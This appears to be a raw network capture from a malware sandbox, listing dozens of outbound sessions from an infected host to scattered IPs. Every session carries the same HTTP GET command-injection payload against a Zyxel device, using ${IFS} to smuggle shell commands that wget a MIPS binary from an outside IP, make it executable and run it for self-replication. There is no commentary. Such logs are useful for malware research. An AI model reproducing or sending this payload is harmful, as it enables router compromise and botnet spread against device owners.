                                      Jan 19, 2024 17:29:50.138549089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8823192.168.2.1453806216.12.174.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138595104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8824192.168.2.1446706121.37.61.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138632059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8825192.168.2.1449512148.44.115.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138684988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8826192.168.2.145490264.192.61.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138720989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8827192.168.2.145861888.74.88.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138729095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8828192.168.2.143426214.84.249.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138767958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8829192.168.2.1451586178.33.252.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138796091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8830192.168.2.14595342.64.46.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138838053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8831192.168.2.1449880173.162.184.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138885975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8832192.168.2.143322297.74.49.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138905048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8833192.168.2.14453084.107.16.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138936996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8834192.168.2.1456150134.93.58.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138989925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8835192.168.2.1435672132.26.189.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139014959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8836192.168.2.1450856195.144.246.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139056921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8837192.168.2.144428896.228.116.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139086008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8838192.168.2.143904838.242.95.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139137030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8839192.168.2.143889296.111.23.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139168978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8840192.168.2.1442524106.129.11.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139224052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8841192.168.2.1458130126.197.137.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139261961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8842192.168.2.14569241.26.202.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139282942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8843192.168.2.144372854.204.143.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139339924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8844192.168.2.1435342171.219.68.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139374971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8845192.168.2.1434914200.84.239.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139410019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8846192.168.2.1439108168.187.100.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139472008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8847192.168.2.143751489.10.195.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139508009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8848192.168.2.1442560123.127.19.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139550924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8849192.168.2.1458240104.88.169.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139605999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8850192.168.2.145016463.40.61.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139658928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8851192.168.2.144014025.0.154.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139710903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8852192.168.2.1434524157.221.121.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139754057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8853192.168.2.1451746208.255.20.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139781952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8854192.168.2.145092831.87.183.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139811039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8855192.168.2.145492223.79.240.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139844894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8856192.168.2.143360659.244.201.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139872074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8857192.168.2.1441526117.74.238.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139925003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8858192.168.2.1438666149.152.36.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.139966011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8859192.168.2.143763060.135.247.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.140007973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8860192.168.2.1455380210.197.67.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.140058994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8861192.168.2.144405648.15.25.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.140095949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8862192.168.2.1452520144.74.16.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.140149117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8863192.168.2.1434470151.176.196.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.143850088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8864192.168.2.143963450.90.18.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.143872023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8865192.168.2.1434518207.173.155.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.143920898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8866192.168.2.1452144172.244.122.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.143949986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8867192.168.2.1445276204.90.49.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.143994093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8868192.168.2.144086894.195.207.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144020081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8869192.168.2.144643871.95.244.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144072056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8870192.168.2.1436854174.210.137.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144110918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8871192.168.2.1446856193.181.92.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144141912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8872192.168.2.1434484158.176.11.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144188881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8873192.168.2.1443454217.113.66.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144212961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8874192.168.2.1459238178.144.72.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144264936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8875192.168.2.143712442.63.162.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144290924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8876192.168.2.144759837.76.10.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144345045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8877192.168.2.1456830153.31.23.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144362926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8878192.168.2.1432790126.162.217.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144442081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8879192.168.2.1448644104.248.53.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144464970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8880192.168.2.1453420104.206.131.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144507885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8881192.168.2.1451756114.22.150.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144548893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8882192.168.2.1432906110.62.70.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144591093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8883192.168.2.1444670138.65.230.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144624949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8884192.168.2.145704624.96.178.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144659042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8885192.168.2.143945458.223.184.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144722939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8886192.168.2.144239017.17.251.5443
                                      TimestampBytes transferredDirectionData
